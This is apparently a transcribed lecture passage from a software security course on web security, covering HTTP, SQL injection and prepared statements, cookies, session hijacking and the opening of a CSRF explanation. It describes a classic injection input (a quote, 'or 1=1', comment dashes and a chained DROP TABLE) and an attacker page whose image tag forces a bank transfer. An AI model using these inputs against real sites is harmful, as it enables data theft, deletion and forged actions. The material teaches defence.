MyClassNotes: Software Security - Week 3

Security for the Web- Introduction

         So far, we have focused on   programs written in C and C++.   We've examined how vulnerabilities in   programs written in these languages can   lead to attacks that violate memory safety   resulting in remote code injection or   theft of sensitive data.   We've also looked at various   defenses against these attacks.   One effective defense is to use   a memory safe programming language.   In this unit, we turn our   attention to internet security,   focusing on applications that   are a part of the world-wide web.   While many web applications   are implemented in type safe languages and   thus avoid memory safety issues,   they have their own sets of problems.   These problems go by names like   SQL Injection, Cross-site Scripting,   Cross-site Request Forgery,   and Session Hijacking.   Interestingly, the issues underlying   web vulnerabilities are sometimes very   similar to memory vulnerabilities.   For example, SQL injection, SQL injection   and Cross-site Scripting arise because,   like buffer overflows,   the application's failure to   properly validate its input results in   it treating data as if it were code.   The modern web, sometimes called web 2.0,   brings in the additional   complication of mobile code.   In particular, when you visit a website,   code from that site will be silently   downloaded to your machine and then run.   Well, how do you insure that this   code does not violate the security of   other programs running in your browser or   on your machine?   The outline for this unit is as follows,   first, we will look into the technical   details of the basic world-wide web.   We will see how typical web applications   are structured at the client and   at the server.   We'll examine http, the hypertext   transfer protocol, which client and   servers use to communicate.   We'll see how improper   interaction with the database on   the server can enable an attack   called Sequel Injection.   Next, we'll look at how web   applications implement ephemeral,   that is short-lived non-persistent state.   Such state is useful during   a long-lived session.   Typically, ephemeral state is implemented   using hidden form fields and cookies.   Unfortunately, sloppy use of these   features can lead to attacks such as   Session Hijacking and   Cross-site Request Forgery or CSRF.   With these attacks, an adversary   can take over a user's account or   manipulate an application to act for that   user, but in the adversaries interests.   Finally, we'll look at so-called web   2.0 which characterises the modern web.   The modern web makes heavy use   of mobile code often written in   the language JavaScript.   JavaScript programs originated   a server but run at the client.   Running code at the client   creates new possibilities for   attack, one of which is called   Cross-site Scripting, or XSS.   With XSS, a user is tricked into running   code he thinks is from a trusted web site,   but in fact it's from a malicious source.   Throughout the unit we will look at   various defenses to these attacks.   One common theme of all of   the defences should be familiar.   Validate your input So, let's begin by   looking at the basics of the web 1.0

Web Basics

         So lets begin by going over   the basics of the world wide web.   The world wide web consists roughly   speaking of two sorts of participants,   clients and servers.   And clients and   servers interact with one another.   So clients consist of things like laptops,   and desktops, and   mobile phones, all of which are interested   in content that's provided by servers.   And these are things like   shopping web sites, Amazon for   example, like information web sites,   Wikipedia, blogs, things like that.   So the client runs a browser,   this is Internet Explorer, or Chrome, or   Firefox, and at the server,   one runs a web server to run the content.   And web servers are like Apache, HTTPD.   Engine X, IIS by Microsoft and so on.   The server often maintains   a database which keeps track of   the information that it's serving.   And the client might also   maintain a bunch of private data   that's relevant to the interaction that   it's having with the server over the web.   The database is often a separate entity,   logically and sometimes even physically.   So, for example,   a database might be MySQL,   that's a particular database management   system, or Postgres or SQL Server.   Much of the user data is stored   as part of the browser or   might be stored as files that   the browser later has access to.   When the browser interacts   with the web server,   it does it via what's called   a universal resource locator, or URL.   And we see one here.   this is the URL for my home page   at the University of Maryland.   So the first part of   the URL is the protocol,   here http,   which we'll talk about in a minute.   The second part is the address of   the host that is serving the content,   where on the internet the server is.   And this is translated into   an internet protocol or   IP address by the domain main service or   DNS.   So when the user types in www.cs.umd.edu,   this address is provided to DNS.   Which will then look it up and   return back an IP address,   which is just a 32 bit integer.   In this case it's 128.8.127.3.   With this information, the browser knows   that it should connect to this Internet   address using the HTTP protocol.   The remaining part of the URL is   the path to the particular resource that   the client is interested   in the server providing.   Here it's till the end of UH/index html,   if we   look at just the last part, the index.html   part, we can see that it's a file.   It's static content because of the suffix   html, so basically the server's just   going to acquire this file and   return it back to the client.   Because it's hyper text,   HTML, the browser will render   that file on the browser screen.   And the user can interact with it,   clicking on links and   filling in forms and so on.   Another sort of URL might have   a different final file, a different path.   So in this case, delete.php.   And the content of that path is different.   PHP is a program written in   the PHP programming language and   the content is actually determined   by running the program.   PHP runs at the side of the server and   it will query the database   to acquire information.   So if the database changes because   other users interact with it.   Then the next time you go to delete PHP,   you might get different   content shown in your browser.   So this is a dynamically generated file.   It's content that's created on the fly.   Now sometimes URLs also have what   are called arguments that direct.   How, the server is going to do   the rendering for dynamic content,   how it's going to produce the page that's   ultimately returned back to the client.   So, here we have a couple of arguments,   F, which is set to joe123, and W,   which is set to 16.   Okay, so   the browser communicates with the web   server using the protocol   that's specified in the URL.   And, the most common one,   the one we'll focus on is HTTP and   this stands for   hypertext transfer protocol.   It's a so-called application layer   protocol when using the OSI network stack   protocol, and it runs on top of TCP,   the transmission control protocol.   Which can exchange collections of   data that reliably across across   a network even an unreliable one.   So what will happen is that a user   might be viewing a web page and   click on the web page.   And as a result an HTTP   request will then be   sent to the server that   was specified in the URL.   Associated with that button click.   This URL is accompanied by headers   in the actual HTTP Request.   And we'll look at those in a moment.   And there are two types of requests,   Get and Post requests.   Get requests are such that all of   the data is in the URL itself.   This data being the data that determines   what file or, or content is returned.   Importantly, it will not change   the contents of data that's stored on   the server.   It will only cause those contents   to produce a file that is   sent back to the client.   A post, on the other hand,.   Which can happen by filling   in a form field and   then submitting it may allow   the server's state to be changed.   In other words it may have side effects.   So here's an example of an HTTP GET   request, and in this case it is to.   reddit.com, and   we can see at the very top the URL and   most importantly, the first two lines,   say that it's a get request and   it's going to the R Security path,   using HTTP version 1.1.   And it's going to get it from   the host www.reddit.com.   Another interesting field,   another interesting header I should say   that's shown here is the User-Agent field.   And this typically identifies a browser,   so this is what the server can use for   example, to provide content   that depends on the browser.   Like when you go to download a Open Source   program and it knows that you're running.   On a MAC, it will know this by looking   at the User-Agent field in the header.   Okay, so   lets suppose we are at this site, and   we follow that link and this content   is then showed to us in our browser.   And we want to click on this worst DDos   attack of all time link that's shown here.   Okay, when we do that, it will generate   an HTTP request that goes to ZDnet.com,   and gets the URL that we clicked on.   Notice here something different   from the last header,   the set of headers we looked at.   There's a so called Referrer field.   And this indicates the web page   that was clicked on in order to   generate the current HTTP request.   And this can be useful for   the server to know whether or   not the request was   generated from content.   Say, that it produced,   rather than from content that   somebody just typed into the browser.   And this does have security ramifications.   We'll look at those more a bit later.   Now lets look at an HTTP Post request.   So here we're posting on a site   called Piazza.com, which is   a course management site that allows you   to have online discussions and so on.   Here we can see the,   the request at the very top   has post as the request type,   along with the URL again.   And we can see the host is piazza.com.   Much of the rest of   the request looks similar.   Here's one part that's different.   The very end includes data that is   explicitly part of the request content.   So for example, these are.   this, part of the request might   be populated by form fields that   are filled in by a user, for   example when responding to a blog post.   So you can see here, at the very right,   a bit of HTML, interesting.   Perhaps it has to do with and so on, that   someone might have typed into a text box,   that then got included in this post   request when they clicked submit.   On the other hand you can still also have   content included in the URL just like you   might for a get request.   Okay so once you've submitted   a request now you're going to   get back a response that   the browser is going to render.   And what is the response look like?   Well, it will contain a status code,   some headers, and then the data.   As well, it will contain some cookies.   We'll talk a whole lot   more about cookies later.   But roughly speaking, these represent   state that the server would like   the browser to store on its behalf, that   helps maintain the notion of a session.   Or other sorts of memories that   the server would like to have,   and, in terms of interactions   with the client later on.   So here's an example response.   At the very top we can see the http   version, the status code and   the reason phrase.   So here the status was 200, which means   that it could find the page that we   asked for, hence okay for   the reason phrase.   Then a whole bunch of headers.   And finally the data at the very end.   You can see here, set cookie,   as part of the header.   These are those cookies that   I speaking about before.   And you can see things like,   at the very end,   content type text html, that indicates the   type of the data that's being provided.   The browser can then use this content   type specifier to know what to do with   the data, how to render it.   One the, the user's browser window.

SQL Injection

         In a web application the persistent or   long-lived data resides in the database.   This is things like personnel records or   credit card numbers, online inventories.   And of course, this sort of data   needs to be protected from illicit   access and tampering.   Even web applications   that recognize this and   do try to protect it sometimes   fail because of a bug that   allows a very clever sort of attack,   called an SQL or SQL injection.   So, in this unit we're going to   look at that attack, but to do so,   we're first going to have to talk   about how data tends to be managed,   and how it's accessed using   a special language called SQL.   So, typically for   an online server application,   we want to support ACID transactions   on our persistent, long-live data.   What's a transaction?   Well it might be a transfer from   one bank account to another, or   a purchase of an item   from an online store.   ACIS stands for first atomicity.   And this is to say that transactions   should complete entirely or not at all.   That is, you should either   completely purchase the book or not   purchase the book, but you shouldn't pay   the money and then not receive the book,   or you should transfer $100 from   bank account A to bank account B.   You should not withdraw the $100   from bank account A, but   then not deposit the result   in bank account B.   Consistency means that the database   is always in a valid state.   That is, as far as other concurrent   queryers of the database are concerned   all of the data in the database   is in the state you expect.   Intermediate states of transactions like,   I've drawn the money from one account but   not yet put it in the next account,   should not be visible.   Isolation basically says, the results   of a transaction aren't visible until   an atomic operation completes.   And finally, durability.   Once a transaction is committed   it should be persistent, durable.   Even if there's a power failure or   some other sort of failure the effects   of that transaction should persist.   Now, achieving acid   transactions is no easy feat.   Fortunately the research community and   industry have done a great job   over the last three or four decades   putting together systems called   Database Management Systems, or   DBMSes, for managing data and   supporting transactions on that data   that provide the ACID properties.   So, the standard way, maybe not   entirely completely the standard,   but a common way anyway,   of storing data is in tables and   accessing those tables using   the standard query language or SQL.   So here on this slide we   have an example of a table.   The name of the table is users, and   the table consists of a bunch of   records where each field of the record   is referred to as a column.   So, here we see that we have five tuples,   a record with five elements: name,   gender, age, email, and password.   And we have four records   stored in the users table.   Now, we can use SQL to read   from this database and   to write to it, update it in various ways,   using different SQL commands.   So the most common SQL command is   probably the select command and   it gives you a way of querying   the contents of a database.   So this particular select command says   look at the age fields in the users table   and select all of them where the same   record as the age has the name D.   So, looking at the table we can   look at the age column, and   find sorry, we can look at the name column   to find the users whose names are D and   then select out the age   column from those records.   So in this case, the answer would be 28.   Another SQL command is update, and   this gives us a way to modify records   that are already in the database.   So this update command says we want   to set the email address of all   users whose age is 32 to be   the email readgood@pp.com.   So if we look at the users table and   we look at all of those users whose   age is 32, there is only one.   It is the third record Charlie, and so   we should update the email address of   that record to be readgood@pp.com.   Another command is the insert command.   This gives you a way to add new   records to the data to the table, and   here we're inserting   into the table a record.   Frank who's male and 57 and so on.   Finally, there's the drop command which   gives you a way of removing data from   the database.   Here we show how drop can be used to   delete an entire table from the database.   Now, server side code will interact   with the database using SQL and   one common way that server side code is   written is using a language called PHP.   So PHP is looks like a hybrid of HTML,   which is the standard markup language for   rendering web pages, along with some   extra code that allows the program,   the PHP program, to query the database and   substitute the results of   that query into variables in the PHP   program that are eventually rendered.   So this is a very convenient and   popular way of writing dynamic   content generation from asking   a database questions and then putting   the results in the generated webpage.   So here on the slide we see a web site,   or we see a couple of fields, user name,   password, and a button.   And we can suppose that when the user   clicks a on the login button he will have   filled in the username and password fields   and these will have been included in   arguments to the URL that was sent   along with the http post request.   So let's suppose then,   that a user types in their username and   password and sends that information along.   That information is going to   be included in the user and   pass variables shown in the PHP code.   So, what is that doing?   Well I've logged in as user, and the query   is going to select star from users.   So it's going to get every possible user   in the users table, where the user's   name is the user, that was typed in,   and the password is the given password.   So, let's suppose that you can fill   in that user field however you like,   the question is, could you exploit   this situation by being clever   in your choice in what   the user field contains.   And in this particular case,   the code is vulnerable to a SQL injection.   How?   Well, suppose we fill in   the user field with this data.   Frank close quote, or 1 equals 1   closed paren semicolon dash dash.   So this text is going to   be substituted in for   the dollar user field inside of   the query that's being constructed as   a string in the mysql query   call to the database.   And after substitution,   this is what the string will look like.   I'll take the frank closed quote and   stick it in for   user, along with everything else, or   one equals one semicolon dash dash.   But what you can see here is that   the way that the string is constructed,   what we've done is we've effectively   modified the query that's going to   be sent to the database.   The frank close quote closes off the user,   as if the user was frank.   And the or 1 equals 1 is another element   of the where clause for the query.   Dash dash is a comment, so   that's effectively ig, causing the SQL   interpreter on the database to ignore the   and password equals portion of the query.   What's this query going to do in the end?   Well, it's going to select every user   whose name is frank or 1 equals 1.   Well, 1 always equals 1.   And so this query will always succeed,   and effectively this will return   the entire contents of the users table.   You can even chain together   statements with a semicolon,   here by adding the semicolon   drop table users dash dash.   Once we substitute in we'll do   the select to grab all the records from   the database and print them out.   And then we will delete the table   by writing drop table users.   So this is very bad.   A very obvious way of coding things,   just putting in the user and   the password,   has opened us up to the possibility that   malicious input can effectively   change the form of the query.   And cause private information   to be returned, or sensitive and   important information to be deleted.   And SQL injection attacks   are quite common.   They're less common than   they were a while back but   they're still a significant   source of vulnerabilities.   So at this point you should know   enough to understand this xkcd comic.   The great thing about the comic   is that at the very end,   it indicates the solution to the problem,   a solution we've seen many times before.   Which is to sanitize your database   inputs to prevent these sorts of   injection attacks from taking place and,   in fact,   that is exactly what we'll   look like in the next unit.

SQL Injection Countermeasures

     .   All right.   So if we're going to understand how to   defend against SQL injection attacks,   we have to understand the underlying issue   that makes those attacks possible, and   that issue is the following.   One string combines code and data.   So this is similar to what   happens with buffer overflows.   When a user types in more characters   than a buffer can hold, then in   an attack like a stack smashing attack,   those extra characters will overrun   the buffer's contents and corrupt control   flow data, like the return address or   function pointers, that then can   manipulate what the program does.   In the same way, we can think that   the code and data boundary is   blurred in an SQL injection, and in sense,   we're overflowing the contents of   that user field and inserting new code   to change the structure of the query.   So in general,   when the boundary between code and   data blurs, we're going to open   ourselves up to vulnerabilities.   So we can see the underlying issue   by viewing the SQL query that we   intend as a parse tree.   So, if you look at that query,   you can see that a select statement   basically has three parts.   First, it's what to select.   In this case, it's star.   That is, all possible records.   Second, it's which table.   In this case, the user's table.   And then third, the where clause   that refines which records should   be considered.   So, we represent that here as   a tree where the first node of   the tree is indicating the select command.   And then the three children from that node   are the three elements of that sort of   command, star, which record,   how many records or   which records, users, which table,   and finally, the where clause.   Now, the where clause itself can   be deconstructed into a tree.   It's basically the conjunction   of two equalities.   It's saying that the name field of   the records selected from users should   be equal to the $user contents.   And likewise, the password field, that is,   the password column,   should be equal to $pass.   So, this should be data and not code.   That's our intention.   Whatever we stick here, it's going to   be a string that's checked for   equality to name.   Unfortunately, by the way we're   constructing this query, we actually will   create a different parse tree by putting   in a clever input like Frank closed quote,   or 1 equals 1.   And that's what we want to stop.   Okay, so we hinted a moment ago   at the end of the last unit that we   should stop it by using input validation.   We should check user input to   make sure that it adheres to   the form that we expect and therefore   only use data that's trustworthy.   And we can make data trustworthy,   we can validate it in two ways.   We can check that it has   the expected form, or   simply we can sanitize   it by modifying it or   using it in such a way that the result   is correctly formed by construction.   So, one kind of sanitization   is blacklisting and   one kind of blacklisting is to delete   the characters you don't want.   So, a blacklist is a bunch of bad things.   So what we could do is we could look   in the input for these bad things and   we can delete them.   So, what are some bad   things we could delete?   Well, we could delete the quote or   the semicolon or   the dash dash because those were important   elements of that SQL injection attack.   Unfortunately, this is not   going to work in some cases.   That is, when those characters have   meaning in reasonable context,   like the name Peter O'Connor.   Another kind of sanitization   is called escaping.   And instead of deleting characters,   escaping would have you change problematic   characters to be safe ones instead.   So here we could eliminate,   we could escape out the quote,   semicolon, dash and so on with the escaped   versions that won't be interpreted in   a control flow changing way   in the constructed query.   So you can do this using libraries and,   and so   on that are provided in various frameworks   you might program in like in PHP.   Now, the downside here is that even still,   you may want to have some of these   these characters in your SQL, and so   this approach is not going to work.   Now, on the checking side, you could use   a whitelist to check that the input is   reasonable and   simply reject it if it's not.   So, for example,   we saw this in C programming that   you can make sure that an integer   is within the correct range.   That is to say the length is,   that's specified by user is no greater   than the actually length of the buffer,   the length it is referring to,   and then reject the input.   And the idea here is that it's safer to   reject an input than it is to fix it.   And the reason there is that a fix may   actually produce the wrong output.   That is,   an attacker can manipulate the attempt to   sanitize something to actually   corrupt it to his to his needs.   So this is the following the principle   of fail-safe defaults, that is,   do the simplest thing and reject the rest.   And we'll look at that principle   actually in more depth later on.   It turns out that whitelisting can   sometimes be hard because it's hard to   specify what the whitelist should be.   For example, if you only want to   allow reasonable first names, well,   how do you know what   the reasonable first names are?   Will you provide a, a specific dictionary   that needs to be iterated through to   check the names against?   Could be both expensive and   difficult to get right.   So, for SQL injection,   SQL injection in particular,   the preferred solution is to use   what are called prepared statements.   And the idea here is to treat user data   according to a type, therefore decoupling   strings the use of strings as code   from the use of strings as data.   So here's our cue, our query again.   Here's the same query expressed   as a prepared statement.   So, the first line creates   a handle to the database, and   the second line creates   a prepared statement template.   You can see that this very much   resembles the string that we   were constructing before.   But the prepared statement instead   includes everything other than   the parts that are to be filled in and   those it designates with question marks.   The filling-in comes as   a separate statement,   happening with the bind_param call.   And here,   the bind_param call takes a format string,   which specifies how many arguments   are to follow and what the types are.   So, the statement has two question marks,   so it expects two arguments.   And therefore, the format string   has two format specifiers,   here SS, where S stands for string.   So, when user and   pass are substituted in to the statement   that's created by the prepared statement,   it will treat the, those data as strings   and not misinterpret them as code.   And then the query can   be sent to the database.   So, we bind the variables.   We type them.   And as such,   we have decoupled compilation,   specifying the template with   the binding process of the data.   So, using a prepared a statement,   we would replace the original   query shown above with this query.   And as such, the binding is only applied   to the leaves where the purple parts   are specified,   leaving the structure of the tree fixed.   So if we had filled in   the user name with Frank or   1 equals 1 as we did in the beginning,   it would be fine because it would not   change the structure of the query.   It would simply be an odd user name   to be looking up in the database.   Now, prepared statements make it possible   to eliminate many SQL injection attacks,   but you may, sometimes queries   are complicated and mistakes can be made.   So you have reason to want to use   defense in depth to mitigate the,   the impact of a SQL   injection should it happen.   One way to do that is to limit privileges.   That is, to reduce the power of   the exploitation by not allowing   the server application to do anything   it wants when accessing the database.   So for example,   when you connect to the database,   you can indicate to the database that   only certain commands should be allowed.   For example, only SELECT queries   on the Orders_Table, but   not on the Creditcards_Table.   You can also chose to encrypt sensitive   data stored in the database, so   if somehow the database is stolen,   that data is going to be less useful.   You may not need to encrypt some of   the tables like the Orders_Table.   So when encrypted data is selected from   the database, it is then decrypted inside   of the server application using a key or a   smartcard or some other sort of mechanism.   But while it's stored in the database   at rest, it's encrypted.

Web-based State Using Hidden Fields and Cookies

         What we have seen so far has been   pretty simple in terms of interactions.   The client sends a message and   the server responds.   But how about multi-message interactions   that might be part of a longer session?   In particular, and perhaps your   own experience, you are used to   a session lifetime in which the client   connects, the client sends a request,   the server responds, the client issues   another request whose content is   based on the server's prior response,   the server responds again, and so   on until finally the client disconnects.   Given this experience,   you may be interested to know that   HTTP has no notion of state or memory.   Each request response pair is completely   independent at the protocol level.   At the least this should make you wonder,   well how is it I don't have to provide log   in credentials with each request, so   that the server knows it's me each time?   The answer is that web applications   themselves keep track of   the relationship between requests and   responses in a session.   They do this by maintaining bits of state   that relate the requests one to the next.   Next, we'll look at how this is done.   So in addition to the long lived state,   that it is going to be stored in   the database at the server, so this will   have things like credit card numbers and   user account information and   inventory and things like that.   The web application will maintain   a femoral state that aids the server   processing while a client   is interacting with it.   So this is not long lived state   that must be durable, but   instead it's keeping track   of what a client is doing   during an interaction to relate   one request to the next.   So, in order to maintain this state   on the client rather than the server,   the server will actually send an encoding   of it back with each response.   And then the client can return   that state to the server when it   makes its subsequent requests.   And there are two ways that we   can implement things this way.   One is to use hidden fields in the HTML   documents that are communicated back and   forth that the server generates.   And the other is to use   something called cookies.   So, let's look at hidden form fields   using an example for an online store.   So here on the left we see   a web page from socks.com.   It's the order.php page.   And let's suppose the client has   navigated, the user has decided to   buy this pair of socks for   $5.50 and clicks the Order button.   Now the server will receive that   request and send a page in response.   And notice that this page   says that the order is $5.50.   So the user is going   to confirm that order.   Now the question is,   how will the server relate the $5.50   request that the server chose on   the first page so that when he or   she clicks the Yes button on the second   page the server makes the right order.   Because HTTP is stateless, it's not   remembering, technically speaking,   one interaction to the next.   And the answer is, that the server can   embed this information, the cost, for   example, of the socks,   in the webpage that it responds with.   That is, the pay.php page.   So here it is, presented to the user.   And notice here we have what's   called a hidden form field.   So a form is just an HTML element   that has a button associated with   it that will produce a web request.   And there are two non-hidden form values,   yes and no.   They're shown at the bottom of this   HTML code, value yes, value no.   And then there's this hidden one,   the value $5.50.   So this hidden value will get sent   with the request when the user   presses the button.   Now here's the code, the PHP code on   the backend at the web server that will   receive this web request, and   it will pull out the form field values.   Pay, that this was a pay request and   price.   And as long as the price was not null it   will debit the credit card that amount and   deliver the socks.   Here's the problem though,   price comes from the user.   It's filled in by this form field value.   Well, because the HTML is sent   to the user, a clever and   malicious user can change   the value to be something far   less than the vendor intended, and   therefore corrupt the computation.   So we can get around that problem   by using hidden form fields   of a special variety that   we call capabilities.   So the server will maintain trusted state.   Instead of sending the state to the client   the server will keep track of the state,   but it will index that state   by a capability that gives   the client access to it.   And what is a capability?   Well a capability is a right.   It's a piece of data that gives   a client who possesses it a right to   perform some action, and   that capability should be unforgeable.   By definition, that would prevent us from   waging the attack that we saw before,   which was that the client was   able to change the price.   Because the capability is intended   to be and should be unforgeable.   The client will not be able to change   it to effectively change the price.   So, given that capability, the client will   reference it in subsequent responses, and   therefore be able to access the state.   To make capabilities unforgeable,   a typical approach is to make   them large random numbers.   So they are difficult to guess, and   therefore if a client does attempt to make   a guess the client is very unlikely to   find a number that corresponds to a real   capability, and therefore has no power.   So here's what the page   looked like before,   here's how we might change it   to use capabilities instead.   So now the name is SID for capability,   and the value is a random number.   On the server side,   we will modify the code to look up the SID   to find the price, and only if the SID   is legal will the price be present,   in which case we'll bill the,   the credit card.   If it's not there, then we'll go to   the else case and cancel the transaction.   So, capabilities of this sort can take us   quite a long way but they aren't perfect.   We don't like to have to pass   around hidden fields all the time.   It complicates the interaction   amongst all the pages.   It's sort of difficult to put   together a web application that way.   And it has the big drawback that,   if you ever close the browser window,   you throw away the HTML that   contained the hidden form fields.   And therefore if you   reopen your browser and   reconnect to the site, all memory   of your prior interaction is gone.   So we can solve these problems by   using what are called cookies.   Just like with capabilities, the server   will maintain some trusted state.   And that state will be indexed by   a cookie rather than a capability.   Just as with hidden form fields,   the server will send along cookies,   along with any responses.   And the client will then   store them locally.   When the client reconnects to the server,   they will send the cookies in response.   Now instead of these cookies   being embedded in an HTML page,   they're actually stored, they're sent   around as part of the HTTP protocol, and   so they're just stored on the disk in an   area that's associated with the browser.   And so it doesn't matter   if you close the page and   it doesn't matter exactly what's on   the page during the interaction.   So here's an example HTTP   response that contains cookies.   One of the headers, well,   many of the headers, as we can see here,   have the form Set Cookie.   And the, what's,   what follows is key=value, which   indicates that the cookie key is the key,   and it's associated with that given value.   And then there are a bunch of options that   specify things like timeouts and paths and   hosts and so on.   So let's dig into that and   look at this example in further detail.   So here on the client,   it receives that HTTP response and   it sees this set cookie header.   And now it's going to process it.   The first thing it does is it says, well   the key is edition and the value is US.   And the options for that cookie   are that the value expires as of   the given date,   perhaps when the session expires.   And the cookie is associated with   the denai, with the domain zdnet.com, and   URLs at that domain that begin   with the subdirectory slash.   So in short, whenever a client interacts   with the server via his browser,   if the interaction is with the given   domain with the prefix of the given path,   then this cookie should be sent   along with that HTTP request.   So, in particular here is that HTTP   response that was received by the client.   We see a bunch of cookies   are being set here.   In a subsequent visit, notice we're   visiting zdnet.com and the root directory,   and at the very bottom there we see   the header that says, well, we're going to   provide these session zdnet production   cookie and we include it's value.   And you can see that this matches   the value that's given on the last line of   the response at the top.   Followed by another cookie,   which is zd region,   followed by further data that's,   again, shown at the top, and so on.   So all the cookies that are relevant   are going to be provided   along with the request.   There are several reasons that   web applications use cookies.   The most common use,   as we've hinted at already, is for   a cookie to act as a session identifier.   Basically, after the user logs   in as part of a post request,   the application sends a cookie in   response that identifies the user.   The cookie is sent in subsequent   requests to the same web application.   So that it can silently   authenticate the user each time.   The human user, of course,   is unaware that this is happening and   interacts naturally with the system.   Another use of cookies is personalization.   Shopping websites for   example, are interested in showing you   things that you are interested in.   They can figure out your interests   based on past interactions.   Based on observations a site can create a   cookie that identifies various interests.   This cookie can be used to prioritize the,   the display of various elements of   the site,   effectively personalizing the site to you.   Personalization can even go to   the level of font choices and   other superficial elements of the display.   The nice thing about cookies is   that these can be anonymous.   Such preferences are not security   sensitive at least from the site's point   of view, and so no authentication   of the particular user is needed.   Of course, the flip side to   personalization is tracking.   Instead of personalization cookies being   used only by a particular site, they can   be made available to other interested   parties, like advertising networks.   How can this work,   given that cookies should only be   visible to the site that created them?   One way is the following.   Site A uses advertising   network B to show an ad.   When B receives the request from   your browser to show the ad,   it can figure out that the ad was   displayed when visiting site A.   How?   Well, by looking at the referrer   attribute of the HTTP request.   For example, the request to show an image.   Site B would like to associate   you with a list of sites and   the pages on them that you tend to visit.   In this case,   it would like to include site A.   One way it could this is   to maintain a list in a database   mapping IP addresses to site lists.   The idea would be you are associated   with a particular IP address and   the list is then associated with   that address and therefore you.   But doing this isn't so reliable because   you are not associated solely with   one IP address, and in fact different   people might use the same address.   Instead, what will happen is the ad   network will store the site list as   a cookie on your machine.   This cookie is called a third party cookie   because it is associated with site B, but   was created when visiting site A.   This way, when you visit other sites   that happen to use the same ad network,   the ad network's cookie will   be accessible to the ad.   It can then add to the cookie,   the current site.   It can even customize the ad as   shown based on previously visited   sites which reveal your interests.   Now one way to prevent this sort of thing,   is to disable third party cookies.   But this method is not perfect thanks   to the ability to otherwise fingerprint   your browser.   But that's a topic for another time.   Let's get back to considering session   cookies and how we can protect them.

Session Hijacking

         As we've already mentioned,   an extremely common use of Cookies   is as session identifiers, which   associate a user with a multi-interaction   session with the website.   The basic idea is simple.   The user first logs into the website, for   example, using a username and password.   On successful log-in, the server sends   back a session cookie with the response.   Subsequent requests to the same site   will also send along a session cookie.   This cookie will either   go in an HTTP header or   will be explicitly included   in a hidden field.   At this point, the server now knows,   who it's talking to.   This approach makes the session cookie   a prized commodity for attackers.   In effect, a session cookie is   a capability to access a site with   credentials of the, of a particular user.   Thus, this capability needs   to be protected from theft.   Otherwise, an attacker can impersonate the   user and perform actions on her behalf.   Such actions, could result in lost or   corrupted data,   like your bank account balance.   To see how theft could happen,   consider where,   sh, cookies show up in an interaction.   First, they are generated and   possibly stored at a server.   Then, they are transmitted between   the server and client and back again.   Finally, they are stored at the client for   later use.   As such, Cookies could be stolen by   compromising, either the server or   client and copying them.   Or if the server's algorithm for   generating Cookies is known,   an adversary could predict,   what a particular user's cookie is.   Cookies could also be copied by sniffing   the network to observe them in transit.   Or the network could be manipulated,   into sending the cookies   to an adversary directly.   Using techniques like DN ash ca,   DNS cache poisoning.   Cookie release due to compromise   can be prevented by building more   resilient clients,   servers, and DNS caches.   In other words, avoid buffer overruns and   the other sorts of errors   we've already seen.   Now, cookie release due to sniffing can be   avoided by using encrypted connections.   In particular, sensitive interactions   after a log-in should use   secure HTTP called HTTPS,   which encrypts the communicasen,   communications, including the cookies.   In fact, by setting the secure   attribute of a cookie,   you can ensure it will only be sent   over HTTPS, and never over simply HTTP.   This fail safe prevents a coding   mistake from inadvertently revealing   a session cookie.   To avoid allowing the adversary   to guess what a cookie will be,   applications should generate   cookies that are long, so   that there are many possibilities for   the adversary to try to guess and random.   So, that the particular   possibility is hard to predict.   Note that the same guidelines should hold   for generating SIDs in hidden form fields.   Now if, despite these protections, a   cookie is stolen, session hijacking can be   further defended against by not using only   cookies to identify a user's session.   Instead, you can build your application   to require correlating information   on the site.   That identifies a user,   users current interaction.   For example,   if the user is currently looking at   a Web page that shows his bank accounts,   but then a request comes in asking for   a transfer the web site should be able   to tell that the request is not valid.   This can be done by storing   hidden fields on pages.   Or using the refer attribute, so   that impossible requests even with   a proper cookie are rejected.   This same sort of protection is used for   CSRF attacks,   which we will discuss shortly.   There are yet more mitigations   against the tax due to stolen cookies.   To motivate them consider   a recent Twitter vulnerability.   Twitter uses a single cookie,   called auth_token to identify a user.   This cookie is computed from   the user name and password.   Now, this approach suffers   from two weaknesses.   First, the auth_token does not   change from session to session.   Second, it does not become invalid,   when the user logs out.   This means that stealing the cookie gives   an attacker indefinite hijacking of   a user's account.   Now, the defenses we've already discussed   can reduce the chance that a cookie is   stolen or that it is used inappropriately.   But there are two more   defenses we can add.   First, do not allow session   cookies to go on indefinitely.   They should have an expiration date.   Now, this is like the expiration   date on your credit card.   It cannot be used after that date.   The other defense is to direct a cookie   to be deleted from a user's machine and   from the server, once a session ends.   This reduces the time that a cookie   is exposed to possible theft due   to compromise.   Finally, let us consider a non-defense.   You might think that you can neuter   an attack by tying a session to   a particular IP address.   That is a user logs in   from one machine and if   a request comes from some other machine,   they must be bogus and should be rejected.   Now, this defense will murk,   will work most of the time but   there are sufficient problems   that it is not usually deployed.   In particular a user's IP address might   legitimately change during a session.   If using a mobile device it   could legitimately roam for   example, between networks.   It could also be forced to   renegotiate an address using   the DHCP protocol for other reasons.   In these cases,   a user would suddenly be denied access.   In addition to these false positives,   relying only on network addresses   will miss some attacks, too.   One example is when a user's machine   is behind a Network Address Translator,   or NAT device.   In such cases.   Hosts beyond the NAT box will view   all clients behind the NAT box as   having the same address.   The NAT box internally translates this   address into different local addresses.   As such,   in a setting like an Internet cafe,   it's not unlikely that all machines in the   cafe will have the same external address.   And as such, one machine in the cafe could   hijack a session of another machine in   the same cafe for   example by sniffing the network.   Once again, the right defense here is   to protect the session identifier.   Next, we'll look at a related form of   attack called Cross-Site Request Forgery   or CSRF.   That requires similar and   complimentary defenses.

Cross-site Request Forgery - CSRF

     .   Recall the two main kinds of web request.   Get and post.   Get requests are meant to be   reads of the server state.   As such, they are not intended to   affect modifications to that state.   Nevertheless, they often do just that.   With this in mind, consider the URL   to the banking website shown here.   Suppose a user is logged into   this site with an active session.   What if an attacker is able to trick   the user into visiting this link?   The outcome for the user is not good.   An unintended bank transfer   out of his account.   The question is, what would   convince a user to visit this link?   So, here's how this could happen.   Suppose the client is logged   in to the banking website, and   at the same time is surfing the Internet,   and ends up at attacker.com.   Attacker.com returns   a page back to the user.   And that page in,   contains this tag, where the tag includes   a reference to the URL that we saw before.   Now the browser,   upon seeing the image tag,   will automatically visit the URL to   obtain what it believes will be an image.   So, it will go to bank.com,   and send the request.   Now, normally if the user was not   logged into the banking web site,   Bank.com would reject the request,   because the user was not authenticated.   But, if the user happened to be   logged in at the same time as when   visiting attacker.com, then this request   will be accompanied by the session ID   that includes the cookie that says   that the user was authenticated.   And as a result bank.com will   dutifully perform the request.   This kind of misdirection attack is called   a cross-site request forgery or 